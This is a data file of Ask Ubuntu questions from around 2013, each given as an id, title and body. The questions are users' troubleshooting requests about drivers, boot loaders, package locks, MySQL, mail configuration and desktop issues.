295333	relating a bug id to its date of creation ubuntu	i am writing a python script to pick up bugs of ubuntu using the lauchpadlib . i want to know all the bugs reported between a certain time period . now there are a few question that i have in mind . are the id 's of the bugs incremented serially in ubuntu launchpad ? ans how can i figure out the id that i need to begin with ? thanks
295338	after updates ubuntu works very slow etc	so yesterday i got a notification of some available updates , in all honesty i have n't looked at what updates these were . i just followed all the updates as usual . now when i start up my laptop , first of all i notice that it takes just a little longer to startup then before ( which does n't bother me ) . but whenever i open an application it takes way too long before it starts , or it does n't start at all . my main problem is that firefox does n't respond at all . after 5 minutes or longer i get an error message saying there is already another instance of firefox running and that i should close it , or restart my laptop . neither of those worked unfortunately . seeing i 'm not that advanced with ubuntu yet , i do n't know what would be the best solution . should/can i recover to an earlier date before the updates ? and if so ; how ? or is this related to something else ? i will appreciate it very much if someone will help me with this ! ! !
295339	ipod 4g ios 6.1.3 ubuntu 12.04 sync ?	i already installed ubuntu 12.04 dualboot on my brandnew vaio windows 8 and it does n't boot any more to windows , so i have a vaio laptop with ubuntu , a thing i can accept but it is impossible to sync the ipod touch 4g ios 6.1.3 so it ( the ipod ) became almost useless cus once i tryed to sync with rhytmbox itunes do n't recogniz'it any more and the music tracks dont play anymore . could anybody help me with this issue ?
295340	how to enable double-click	i ca n't open folders with double click anymore . instead i have to right click and press open . how do i reenable it ? i 'm running ubuntu 13.04 .
295349	does encrypting the hard drive affect file sync with programs like dropbox , ubuntu one , spider oak , insync , and others ?	for the last few months i 've been having a lot of problems syncing with two computers that i reinstalled and encrypted the drives . it is happening with all the programs i mention in the subject . can the encryption of the disk be the cause of the problem ? my encrypted ssd uses luks version 1 , lvm2 pv update : my home does use ecryptfs . this is the relevant line of df -t : /home/ramon/.private ecryptfs 118659356 86991664 25633468 78 % /home/ramon
295355	replacing nautilus with nemo : wallpaper problems	i have installed nemo from the cinnamon ppa and used the instructions here to set it as the default file manager on my system ( ubuntu raring ) . it works perfectly , but causes a strange issue with the system wallpaper . when i log in , no wallpaper is loaded and the background is simply the remnants of lightdm with the login box etc visible . only when i open nemo , close it , and open it one more time does the wallpaper load . i assume this means that nemo has taken over responsibility for the desktop from nautilus , but i would like to know how to have it load the wallpaper immediately . thanks for any help .
295358	how do you run a programme from a script.sh	what i 'm trying to achieve i have to start somewhere , so here goes . i am trying to start two programmes at startup and i would like to learn how to write a script.sh file at the same time . question how do i find the file i need to point to to make it run ? ( in windows it was easy , just look for the .exe file ! )
295367	reinstall ubuntu dual boot windows xp	i got a ubuntu 10.10 dual booting with windows xp . everything was working fine , but since 10.10 is no longer supported , i want to upgrade it to 12.10 or 12.04 . in the past i have had loads of problem with upgrading/installing linux . most of the time is fighting with the grub and the windows boot manager . back to the point , my question is , is it possible to just simply install 12.04 into the partition containing 10.10 ? if yes , is there a specific guide i have to follow ? and also , if i just install 12.04 into the partition containing 10.10 , what will happen to grub ? will it still register my windows xp ? i 'm being very cautious here..do n't wan na reinstall my windows xp because it 's a pain.. thanks : )
295372	autocomplete while compiling a file with c++ is gone	i am using ubuntu 13.04 and have been programming mostly in c++ . i use vim editor and c++ command to compile my .cpp file . what i have noticed is after typing c++ and pressing the tab key , an autocomplete was expected for the files present in the current directory , but it gives no result . it was fine before , and i have become used to the c++ command for compiling my files . please help .
295373	installing external softwares in bootable ubuntu in usb	i am new to ubuntu , and this question i am asking here is more about a curiosity . i already have ubuntu installed on a pendrive , but while roaming the internet , i came across this link ubuntu installation in usb . i want to know that if , in a liveusb ubuntu , we install any other external softwares ( for example , avg antivirus ) , can this pendrive ( with the external softwares installed ) be used on another computer and still be able to use this external software ? edited i have installed kubuntu using universal usb installer and created a live kubuntu in my pendrive . while booting kubuntu it asked for two options 1 ) try kubuntu or 2 ) install kubuntu . i have clicked try kubuntu option and it went to the live kubuntu ( not installed ) desktop . then i tried to install vlc using the given tutorial and it too were succesful . after installation of vlc i opened it and run some videos also . but when i restarted the computer and used `` try kubuntu '' option , for my surprice i was unable to find the installed vlc player in the kubuntu . can any one tell me what is the problem how i can rectify this .
295374	ubuntu 13.04 64 bits interface freezes when running videos on chrome , firefox and chromium	ubuntu 13.04 64-bit , interface freezes when running videos directly in the browser , leaving only the mouse pointer moving . behavior occurs with browsers google chrome , chromium and firefox . my hardware : intel pentium dual core g860 integrated video processor ( intel hd2000 ) motherboard asus p8h61-m le br 4gb ddr3 dual channel i think something on the flash .
295378	install 13.04 as base os without any windows . install on raw disk	to whom it may concern , i am having an issue finding a live install iso for ubuntu that i can boot my daughters laptop with to install ubuntu again . her last installation of ubuntu 12.04 ( upgraded from 11. ? ) crapped out and locked up . i 'm in the process of recovering her /home information to my nas for her to reload her files onto the new hard drive i installed . i ca n't seem to find an installer without that god awful wubi.exe crap . can someone please point me to the installer that does not first insist i 'm running winblows first ? i have one , and only one windows machine that my daughter uses to play sims ( off the network ) . other than that every one of my machines is either linux ( fedora/ubuntu ) or a mac ( my other daughter ) . i would n't have the windows machine if she had a mac too , because sims runs on apple mac 's . why do these developers not make it more apparent on the download page that this installer is for the starter people who want to test the waters within windows . i 'm not a starter linux user ! i want a base os bootable iso that i can install the latest ubuntu from . if not , then my daughters laptop 's will become fedora laptops . thank you , bill
295379	why the same arabic string shows differently in windows 7 and ubuntu linux ?	the same arabic string , in windows 7 notepad : in ubuntu linux vi : they are the same string in a file , but the display order is opposite , why ?
295382	wifi does n't work in software center	i have a public wifi network which has wep security . it requires a key ( 7a5c3a4e28 ) to establish connection and a username and password when i open a browser to surf . but in software center there is no demand of username and password hence i ca n't use it to install anything on my ubuntu 12.04 lts . please give solution for this .
295387	warning : the opengl rendering context obtained on x display	i 've installed bumblebee with this tutorial http : //eternalvoid.net/tutorials/linux-optimus-gt650m/ and when i try optirun i 've got black screen & this : $ optirun glxspheres polygons in scene : 62464 visual id of window : 0x21 xlib : extension `` nv-glx '' missing on display `` :8 '' . [ vgl ] warning : the opengl rendering context obtained on x display [ vgl ] :8 is indirect , which may cause performance to suffer . [ vgl ] if :8 is a local x display , then the framebuffer device [ vgl ] permissions may be set incorrectly . context is indirect opengl renderer : gallium 0.4 on llvmpipe ( llvm 0x301 ) [ vgl ] error : opengl error 0x0500 [ vgl ] error : in readpixels -- [ vgl ] 310 : could not read pixels lenovo y580 , ubuntu 12.04 x64 , nvidia ver.driver 319.17 it 's a problem with driver , configuration or something else ?
295389	about graphic card	hello everyone i might have a problem with my laptop graph覺cs ( samsung p5cs02 tr laptop ) first off all , i have nvidia gt 650m 1 gb graphic card and intel hd 4000 graphics 1 gb my problem is ubuntu probably can not read my graphic cards here 's some screenshoots my system details ( sorry i cant make it english now ) as you can see it says intel ivybridge mobile , not nvidia stuff and my additional driver section is empty so i dont wan na install windows for games , i think i can run most of games ( i dont care about ultra settings ) how can i get full graphics from my laptop thank you so much everyone grettings , mert
295390	problems to save pdf files from dropbox	i 'm trying to download one list of scientific papers in pdf format from dropbox . but the download process stops at 100 % ( without conclude ) . the interesting point is that i can open my file directly on the browser , or even in a pdf reader . but i 'm not able to save it . one example of the problem : ubuntu version : 12.10 from : dropbox size of the file:374kb name of the file : packalăšn , mehtă¤talo , maltamo - 2011 - als based estimation of plot volume and site index in a eucalyptus plantation with a nonlinear mixed effect model that accounts for the clone effect.pdf destination : /home/user/downloaded/ some suggestion ? thanks in advance !
295393	why is ubuntu so slow on windows 7 capable system ?	i love linux and i think it is the best os out there , but for some reason it is noticeably slower than windows 7 on my machine . it hangs a lot , and none of the animations are smooth . it is a hp pavilion dv9700 laptop . i have 2 gb of ram and a dual core intel processor . i will add the hardware output from lshw in the end of this question . i hope you can help me because i really love the linux philosophy and do n't want to have to go back to microsoft and windows . ps : i tried mint and ubuntu and also installed the xfce and lxde versions of ubuntu . still it lags a lot , which should n't be so bad with my specs i think . i guess it may be a compatibility problem , but i ca n't put my finger to it . that 's why i will add my specs in the lshw at the bottom , maybe you guys can find the problem ? description : notebook product : hp pavilion dv9700 notebook pc ( fn466ea # uug ) vendor : hewlett-packard version : rev 1 serial : cnf83019hr width : 64 bits capabilities : smbios-2.4 dmi-2.4 vsyscall32 configuration : boot=oem-specific chassis=notebook family=103c_5335kv sku=fn466ea # uug uuid=434e4638-3330-3139-4852-001e6885be89 *-core description : motherboard product : 30cb vendor : quanta physical id : 0 version : 79.2e serial : none *-firmware description : bios vendor : hewlett-packard physical id : 0 version : f.59 date : 11/25/2008 size : 100kib capacity : 960kib capabilities : isa pci pnp upgrade shadowing escd cdboot bootselect int5printscreen int9keyboard int14serial int17printer acpi usb agp smartbattery biosbootspecification *-cpu description : cpu product : intel ( r ) pentium ( r ) dual cpu t2410 @ 2.00ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) pentium ( r ) dual cpu t2410 slot : u2e1 size : 1067mhz capacity : 2ghz width : 64 bits clock : 533mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx x86-64 constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm dtherm cpufreq *-cache:0 description : l1 cache physical id : 5 slot : l1 cache size : 64kib capacity : 64kib capabilities : asynchronous internal write-back *-cache:1 description : l2 cache physical id : 6 slot : l2 cache size : 1mib capacity : 1mib capabilities : burst external write-back *-memory description : system memory physical id : c slot : system board or motherboard size : 2gib *-bank:0 description : dimm ddr2 synchronous 533 mhz ( 1,9 ns ) physical id : 0 slot : dimm 1 size : 1gib width : 64 bits clock : 533mhz ( 1.9ns ) *-bank:1 description : dimm ddr2 synchronous 533 mhz ( 1,9 ns ) physical id : 1 slot : dimm 2 size : 1gib width : 64 bits clock : 533mhz ( 1.9ns ) *-pci description : host bridge product : mobile pm965/gm965/gl960 memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 0c width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : mobile pm965/gm965/gl960 pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 0c width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:2000 ( size=4096 ) memory : cc000000-ceffffff ioport : d0000000 ( size=268435456 ) *-display description : vga compatible controller product : g86 [ geforce 8400m gs ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : ce000000-ceffffff memory : d0000000-dfffffff memory : cc000000-cdffffff ioport:2000 ( size=128 ) *-usb:0
295398	permanent chmod 777	how can i set chmod 777 for my lamp server ? i am the owner of the www folder ( sudo chown -r martin www ) . i have changed the permissions of all files ( sudo chmod 777 -r www ) . i do n't know why , but my website is working only with chmod 777 . otherwise i see only white page . i 'm working with .tpl files ( include file= '' header.tpl '' , but when i use a new file , it will be not shown until i make chmod 777 for that file ) . how can i set chmod 777 permanently for all new files in this folder ?
295401	how to mount image.iso and create an option in grub to install ?	every now and then new versions of os are released . i want to try them out but what i do n't want to have to burn a new cd/dvd or create a bootable usb , every time . i do n't want to use usb or cd/dvd . how can we install an iso from grub when the computer starts ?
295403	how to rename multiple files ?	i 'm trying to move some files to another folder that already contains older files with the same name . nautilus asks me every time to rename the duplicate files and they 're too much to rename them individually . is there any way like ( keep both ) in windows ?
295405	ubuntu 13.04 unity black and white pixilated screen after suspend resume	whenever i suspend and resume my laptop i get the following screen ( see link to image below ) . i can do ctrl+alt+f1 to get to tty and i can kill and restart unity but it seems to have no effect when i try to go back using ctrl+alt+f7 . interestingly this only happens when i do n't have my secondary monitor plugged in . when the secondary monitor is plugged in the system resumes to the gui fine . i looked at /var/log/pm-suspend.log and did n't see any errors or anything that jumped out as suspicious . has anyone else experience this or know where i can look to diagnose the issue ? sudo dmidecode | grep -i macbook product name : macbookpro8,2 family : macbook pro version : macbookpro8,2 when the computer resumes music that had been playing when i suspended the computer will resume playing . so i believe it is resuming correctly it 's just the graphics that are getting messed up for some reason . edit : a workaround that seems to work is to plug in my external monitor and then login . however carrying around my external monitor and a power source would be extremely inconvenient : ) but hopefully this gives a clue to what 's actually going on . also doing this causes my main display 's desktop to be black . while i can drag windows onto my main monitor and my toolbar works ( using cinnamon ) the background image does not appear ( it flickers on then off when i try to change the background ) . i also can not right click on my main monitor background but i can on my secondary ( laptop ) background . killing and restarting cinnamon does not fix the background issue either .
295407	how to burn 801mb iso file	i have ubuntu 11.10 ( xfce ) and i download xubuntu 13.04 64bit iso file that have 801mb and both brasero and xfburn ca n't burn that image on 800mb cd-r. can i burn that image on that cd using overburn ( those programs do n't have that option , i use to do that on windows but never on gnu/linux ) or do i need to buy larger cd ?
295411	how did i do this ? - file content removed !	first of all , thank you for your contribute to this forum ! i switched to ubuntu a few months ago for working reasons and these pages are a great help ! now , getting to the point : i was trying to count a specific pattern in a text file : grep -c [ pattern ] [ filename ] now : the pattern was : 'greater than ' sign , i.e . : > thus the command i gave was : grep -c > [ filename ] i got this message : usage : grep [ option ] ... pattern [ file ] ... try `grep -- help ' for more information . but now the text file was empty ! ( fortunately i had a backup ... ) . why ? did i mess up in some previous operation or was it the last command i gave ? i am just trying to make sense of this .
295414	how to properly install ubuntu on imac ? ( bootcamp )	i installed bootcamp on imac few years ago . two systems ( windows vista and mac os x 10.4 ) work just fine ... i downloaded ubuntu 13.04 , burned it to the dvd and it works perfectly ( i did n't install it so far ) . now , i would like to keep mac os x and ubuntu 13.04 ( instead of windows ) . i read somewhere that bootcamp is not the best solution for ubuntu 13.04 ( some problems could appear because access to disk is `` emulated '' ) ... how can i install ubuntu 13.04 properly ?
295417	libreoffice 4.03 compatibility with ms office 2010 docs	i apologize for the repetitiveness of this question , but i just yesterday decided to use ubuntu 13.04 as my only operating system and am trying to figure a few things out . no , i do n't mean figuring out things with ubuntu as i have been messing around with the system for some time on older machines and on vms . my question is , since the release of libreoffice 4.03 , are we still looking at any incompatibilities when read/write ms office .docx files ? the university that i attend requires us to turn in weekly projects in word 2010 .docx format . i would love it if i could use the office suite included with ubuntu , which just happens to be libreoffice 4.03 , but i have read numerous articles in the past that there are some incompatibilities such as tables not displaying correctly and some items getting aligned differently . these problems absolutely can not happen on any of my projects ; otherwise , my professor will dock points on each project . can anybody confirm if these problems still exist ? i know it is quite easy to get ms office 2010 to work through playonlinux , but i want to know if libreoffice is totally compatible with .docx , .xslx , and .pptx file formats or if i still need to save in the old office 2003 format . thank you for any help you guys could provide !
295418	ubuntu server as an internet server	how can i configure an ubuntu server installation to provide internet access to private network , such that machines on the private network can access the internet through the ubuntu server ? the machine has two nics of course .
295424	how can i find the url for a flash video in firefox ?	at nasul tv is a tv recorded show , free . i want to be able to find the url for the video and then to use wget to download it . how can i achieve this ?
295426	going back to a previous ubuntu state	15 years ago goback came out which let windows users revert changes and restore a computer to a previous state . it did this by imposing a journaling system underneath the os - at the block level , not the file level - and letting you roll back changes . is there anything like that for linux ? it 's easy to do this inside virtualbox , but i 'd like this to be for my main top-level machine . how easy would it be to make a virtual machine be one 's normal machine ? how would one go about this ?
295435	qtfm : error while loading shared libraries:	install qtfm , on 12.04 but it would not open . opening in a terminal yields this message : qtfm : error while loading shared libraries : libmagic.so.1 : wrong elf class : elfclass64 how do i fix ?
295438	split screen using hdmi xubuntu 13.04	i 've tried to get separate screens for xubuntu 13.04 so i can browse on my laptop and use my tv to watch films via the hdmi port , but i 'm unable to find a way to do it . what normally happens is i get full screen on the tv , but my laptop display gets warped showing 1/4 of the screen . i 've tried changing the resolution of my tv in monitor settings , but it just gets hdmi no signal on the screen . i 've tried arandr and grandr , but had no luck .
295440	filemaker pro on ubuntu	i am seriously considering migrating to an ubuntu os for my small business . i currently use filemaker pro for my invoices and reports , and i was wondering if i could use that in an ubuntu environment . please help .
295441	problem installing ubuntu 13 alongside windows8 - can not see partition system	i got quite a problem for some time that prevents me from installing ubuntu ( finally ) . i got an asus laptop bought in late 2012 , that came with windows 7 pre-installed . i upgraded it to windows 8 ( due to low cost of it ) and now , after booting ubuntu ( 13.04 64bit ) form usb , the installer can not see my windows installation - it only shows it , as it was free/unallocated space ( and it is n't ) . i tried using gparted to determine what 's wrong , but i got an error with gpt partitioning system . then i ran fdisk and later gdisk to see how it looks , but was afraid to advance ( no chance to backup my data right now ) . with fdisk i got warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xbfb81289 device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 251660287 125470720 7 hpfs/ntfs/exfat /dev/sda3 251660288 1255428095 501883904 7 hpfs/ntfs/exfat disk /dev/sdb : 1029 mb , 1029701632 bytes 19 heads , 50 sectors/track , 2116 cylinders , total 2011136 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc1550fc5 device boot start end blocks id system /dev/sdb1 * 1520 2011135 1004808 c w95 fat32 ( lba ) then from gdisk i got : ubuntu @ ubuntu : ~ $ sudo gdisk -l /dev/sda gpt fdisk ( gdisk ) version 0.8.5 partition table scan : mbr : mbr only bsd : not present apm : not present gpt : present found valid mbr and gpt . which do you want to use ? 1 - mbr 2 - gpt 3 - create blank gpt your answer : with 1 i get : your answer : 1 disk /dev/sda : 1465149168 sectors , 698.6 gib logical sector size : 512 bytes disk identifier ( guid ) : 278a81de-39c9-489d-ba00-947f39be2d0e partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1465149134 partitions will be aligned on 2048-sector boundaries total free space is 209723053 sectors ( 100.0 gib ) number start ( sector ) end ( sector ) size code name 1 2048 718847 350.0 mib 0700 microsoft basic data 2 718848 251660287 119.7 gib 0700 microsoft basic data 3 251660288 1255428095 478.6 gib 0700 microsoft basic data and with 2 : your answer : 2 using gpt and creating fresh protective mbr . disk /dev/sda : 1465149168 sectors , 698.6 gib logical sector size : 512 bytes disk identifier ( guid ) : 91b5a850-8718-4d8c-aa48-4da569e5beae partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1465149134 partitions will be aligned on 2048-sector boundaries total free space is 1465149101 sectors ( 698.6 gib ) number start ( sector ) end ( sector ) size code name any clues or ideas how to deal with this ? thank you in advance p.s sorry for long post ...
295442	nemo , open as root , ubuntu 13.04	i replaced nautilus with nemo in ubuntu 13.04 from these excellent instructions : how to completely remove unity , and replace it with cinnamon ? however , i ca n't `` open folder as root '' from nemo . know what i can check ? everything else seems to work great . got closer , i installed gksu , and it prompted me for the password , however it would n't accept it and could not open . seems like i 'm missing something in my nemo install . maybe i 'll try reinstalling . ( did that , no change ) nemo seems to be using gksu , not gksudo ... i can simulate it from the command line . not sure how to tell it to use gksudo instead for `` open as root '' . pretty sure that 's the problem , as i can tell by the password dialog that gksu is being run instead of gksudo .
295446	how to have root access without logging as root ?	i am using 13.04 trying to edit or drag and drop files but since all the folders are owned by root and assigned to the group `` root '' i am not allow to do this . i added my current username to the `` root '' group and still i am not able to edit . i do n't want to have to login as root to do this , or change all the folders group to something else . what are my options .
295455	how to build libharu and the examples which are included	i downloaded libharu from http : //libharu.org/ . libharu is a opensource pdf creator . now in the install file says i only have to run ./configure & & make & & make install . when i run this i get the error bash : ./configure : no such file or directory . yes i am in the correct same folder as where i extracted the files , there is however a file called configure.in which i guess has something to do with it . now next to how i can build libharu i would like to know how i can build the examples . i only see a file cmakelist.txt does n't each example need a make file on its own ?
295457	mysql datadir on different hard drive	i 'm currently running ubuntu 13.04 and mysql 5.5 . i have been using innodb , and the default location for installation . the problem is that my main os partition is fairly small ( 36gb ) , and i need to move my database to my 2tb drive . i 'm trying to change mysql datadir from : /var/lib/mysql to : /path/to/new/directory but i 've been running into all kinds of problems . mysql refuses to start , and generally tells me there are problems with permissions . this does n't make any sense to me , though . here is what i have tried doing : i copied the files : cp -r /var/lib/mysql /path/to/new/directory i edited /etc/mysql/my.cnf : datadir=/path/to/new/directory updated the permissions : chown -r mysql : mysql /path/to/new/directory updated apparmor : /path/to/new/directory/ r , /path/to/new/directory/** rwk , i make sure to reset apparmor : service apparmor restart but it still gives me errors . i am not sure what else i need to do . does anyone have a definitive guide to making this work under ubuntu 13.04 , mysql 5.5 , and innodb ?
295458	12.04 unattended-upgrades package has lock on /var/lib/dpkg/lock ( can not sudo apt-get update due to lock )	calling the sudo apt-get update fails to complete . fails with : fetched 2,212 kb in 13s ( 162 kb/s ) e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? investigation with lsof yields : $ sudo lsof /var/lib/dpkg/lock command pid user fd type device size/off node name unattende 24512 root 4uw reg 8,2 0 5506231 /var/lib/dpkg/lock the process is revealed to be the unattended-upgrade package : $ ps aux | grep 24512 root 24512 0.0 0.0 98652 5764 ? dn 07:33 0:01 /usr/bin/python /usr/bin/unattended-upgrade the last bits in the most recent log file are ( tail /var/log/unattended-upgrades/unattended-upgrades-dpkg_most_recent_timestamp.log ) : installing new version of config file /etc/java-6-openjdk/security/java.security ... setting up openjdk-6-jre-lib ( 6b27-1.12.5-0ubuntu0.12.04.1 ) ... setting up icedtea-6-jre-cacao ( 6b27-1.12.5-0ubuntu0.12.04.1 ) ... setting up icedtea-6-jre-jamvm ( 6b27-1.12.5-0ubuntu0.12.04.1 ) ... setting up openjdk-6-jre ( 6b27-1.12.5-0ubuntu0.12.04.1 ) ... setting up openjdk-6-jdk ( 6b27-1.12.5-0ubuntu0.12.04.1 ) ... running strace outputs nothing after the attach line : $ sudo strace -p 24512 process 24512 attached - interrupt to quit turning unattended-upgrades on/off with dpkg-reconfigure executes , but does n't solve the problem . $ sudo dpkg-reconfigure unattended-upgrades this computer has been up and running for over 100 days , but there have been recent power outages to the surrounding areas recently that took out the internet . how can i safely end the process and remove the file lock ?
295462	how can schedule to run 'deluge bt client ' in ubuntu 12.1 using gnome schedule	since it 's a gui there is bit of complication . can you guys help ? thanks . ( i need a recurrent task btw )
295464	cancelling print jobs and dealing with printer	where can i see printing jobs in queue ? sometimes even after restarting the computer , a print is not forgotten and when i turn on printer it begins to print some jobs from previous actions which i no longer need them be printed . how can i see the printing jobs queue and cancel them ? ! i use ubuntu 13.04 with plasma desktop . no messages is shown when a print job is waiting to be printed . also there 's not any message if a paper jam occurs or any other printer messages .
295474	problems installing usvision	i am trying to install usbvision from sourceforge.net i am obviously doing something wrong sudo apt-get install usbvision-0.9.6 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package usbvision-0.9.6 e : could n't find any package by regex 'usbvision-0.9.6' if you can help , i would be most grateful . i am running ubuntu 13.04 on a sony vaio vgn-ar71e
295475	linux mail command not working like it used to	i was using the following mail command in my crontab to which worked flawlessly until we re installed our mail server last friday : echo `` testing 123 '' | mail -s `` ecs postdate processed '' `` layton.everson @ gmail.com chrish @ mycreditcompany.com '' -- -r `` noreply @ mycreditcompany.com '' -f `` servercronjobs '' previously the `` -- '' would rout the command line parameters to sendmail to send from a name and add a reply-to address . now it seems the -- is being ignored and all of the extra parameters are being treated as email addresses . so the email is going to : from root < root @ mycompany.com > to me , chrish , -r , noreply , -f , servercronjobs what is missing now ?
295476	tp-link wirless n , tl-wn725n	i 've just bought the above adapter after my old belkin one gave up . i 've seen a few solutions to peoples problems on here but have n't had any success myself yet . which means this is coming from my phone . not good . the adapter does n't seem to be working at all , the only time i can see it is lsusb- id 0bda:8179 realtek semiconductor corp. is this what the adapter is meant to look like ? running 10.04 , kernel 2.6.32-45 . i 've tried installing the rtl8721 drivers , which comes up with 2 errors when i try to install it . something to do with linux header package , but i 'm pretty sure i 've got them for my kernel . tried blacklisting a few drivers but nothing 's working . will upgrading to the latest release be the quickest solution ? sorry i ca n't copy more info across , as i said , working off my phone for now ! thanks for any help tim
295477	meaning of total errors on result of clamav scan	i scanned my ubuntu computer using clamav the following are the results known viruses : 2288150 engine version : 0.97.8 scanned directories : 55215 scanned files : 283662 infected files : 0 total errors : 18736 data scanned : 16464.40 mb data read : 30027.11 mb ( ratio 0.55:1 ) time : 4558.179 sec ( 75 m 58 s ) my question is what are total errors and i should i do some thing to remove them ?
295485	mouse trails on monitor connected to nvidia videocard in multi monitor setup on ubuntu 13.04	i have a problem on my pc w/ ubuntu 13.04 ( fresh virgin installation as of yesterday ) my hardware spesifications : asus p8z77-m pro mainboard asus geforce gt210 pcie videocard 2x philips 24 '' monitors at 1920x1080 each monitor is connected to the hdmi-output of the videocards ( so one to the onboard vcard of the mainboard and one to the geforce vcard ) on the screen connected to the onboard vcard ( set as primary screen in the bios ) everything works perfect but on the screen connected to the geforce vcard i have very irritating mouse trails and the screen behavior is abnormal ( lag , refreshes take ages ) i tried installing the latest nvidia drivers but that messed up the ubuntu installation completely and i decided to reinstall ubuntu ( no problem since i installed 1hr before )
295491	change grub2 boot device	i have a macbook pro , and i use refined to dual-boot ubuntu and mac os x . in case i ever messed anything up , i installed ubuntu on an external hard drive . however , i messed up the setup so i installed grub onto the hard drive . now when i boot grub without my external hard drive connected , grub goes into grub rescue with `` can not find device . '' i can still boot any of my oses if the hard drive is plugged in . how can i fix this ? will uninstalling grub from the hard drive help , or do i have to configure refined differently ?
295493	ca n't install apache2 on ubuntu 12.04.1 lts	i run sudo apt-get install apache2 and i get this error : setting up apache2-mpm-worker ( 2.2.22-1ubuntu1.3 ) ... /usr/sbin/apache2 : symbol lookup error : /usr/sbin/apache2 : undefined symbol : apr_thread_pool_task_owner_get * starting web server apache2 /usr/sbin/apache2 : symbol lookup error : /usr/sbin/apache2 : undefined symbol : apr_thread_pool_task_owner_get action 'start ' failed . the apache error log may have more information . invoke-rc.d : initscript apache2 , action `` start '' failed . /var/log/apache2/error.log is empty . is it possible to install a different version of apache2 ? or maybe from a different source ?
295494	my ubuntu runs in slow motion on ubuntu 13.04 asus 1015cx	my specs : my asus eeepc 1015cx certified by ubuntu 12.04 lts asus 1015 cx with gma 3600 graphic card intel atom dual core ubuntu 13.04 my problem : i need to use ubuntu 13.04 , not 12.04. ubuntu 13.04 runs in slow motion on default unity desktop , is it graphic card problem ? when i clicked file , runs in very slow animation on unity . windows comes up in very slow motion i ca n't even use ubuntu 13.04 because so slow . what 's minimal requirement of ubuntu 13.04 or unity desktop ? why is it so slow ? what kind of processes should i take to fix it ? i tried by myself but no good result . need some help anyway . any ideas ? maybe i should change hardware lol ? my asus eeepc 1015cx certified by ubuntu 12.04 lts !
295496	should i pick william donovan or chomsky for my server and why does the software make presumptions	i recently installed ubuntu 13.04 by upgrading since my download copy was not booting the os . it failed to reboot as soon as i restarted 13.04 after installing it . this occurred several times so i ca n't chalk it up to fate as i see on googles others have had this problem . thus i used my copy of 12.04 that is a canonical provided copy to start the installation and just upgraded the os after a minimal install with 12.04 and 12.10 using 32 bit copies . i normally use the 64 bit variety of ubuntu but wanted to go ahead and test out 13.04 to keep up with what improvements the fantastic and dedicated community of developers and engineers have in store for the faithful . i upgraded my system using the recommended script at debianhelp.wordpress.com and after using this script , i am getting a `` failed to download repository information '' error when i use the anarchist logo upgrade button on this version of ubuntu . i noticed my updates seemed a little slow so i used the `` what is the best server for my location '' test in the software and updates window to tell me the best location for updates for my computer . since i live in central pennsylvania , i was surprised when i got a response that i should use a mirror in singapore . not only that , the server name serves to remind me that perhaps i had perhaps ventured into wild bill donovan territory . here 's the url of where i was redirected . http : //linux.ntuoss.org/ubuntu now i do n't mind helping wild bill donovan , but can anyone explain why this anomaly occurred ? i 'm switching over to the chomsky mirror at mit until i can understand why it is necessary to send me out of the country for upgrades to my garden variety computer . can anyone explain this ?
295497	how can i get diffuse to play well with a python virtualenv ?	diffuse is installed on my workstation and plays well with mercurial so i often use it for diff'ing . however , i also am using a python virtualenv to use some different modules in a more controlled setting ( easier to ship off to other people ) . when i try to run diffuse from within my virtualenv ( here named sandbox ) it pukes : ( sandbox ) nickt @ aiguadassi : /home/codes/nickt/tape-worms/code $ diffuse bread.py # fail ... traceback ( most recent call last ) : file `` /usr/bin/diffuse '' , line 124 , in < module > import pygtk importerror : no module named pygtk outside it works just fine ... ( sandbox ) nickt @ aiguadassi : /home/codes/nickt/tape-worms/code $ deactivate nickt @ aiguadassi : /home/codes/nickt/tape-worms/code $ diffuse bread.py # works fine . i assume diffuse is a python app and is relying on finding modules in the environment ; is there a way to have it use the 'global ' environment ( e.g . via an alias ) ? i 'm not sure what the program is doing with respect to the environment ... is it searching through path for modules , trying to use whatever which python turns up ...
295504	restore documents and media files	while i was installing ubuntu 13.04 64bit , i did a mistake and i format the hard disk before that i divided my hd to 3 partitions , c : for win8/ d : for documents and media/ u : for ubuntu 12.04 what i need is to recover the documents and media files another thing is that i ca n't find the workspaces , and the multi windows option
295505	how do i update alternatives to use sendmail ?	this is an expansion of my question : linux mail command not working like it used to which i would considered answered but i need a little more clarification . in my previous question i learned that the `` mail '' command is really an alias or link to a configured mail program . so i 'm trying to get it to send mail through sendmail , which i have re-installed on my server but i 'm not sure how to do this . when i run the command : sudo update-alternatives -- config mail it responds with : update-alternatives : error : no alternatives for mail . how can i add sendmail to the alternatives ? thanks in advance for you help .
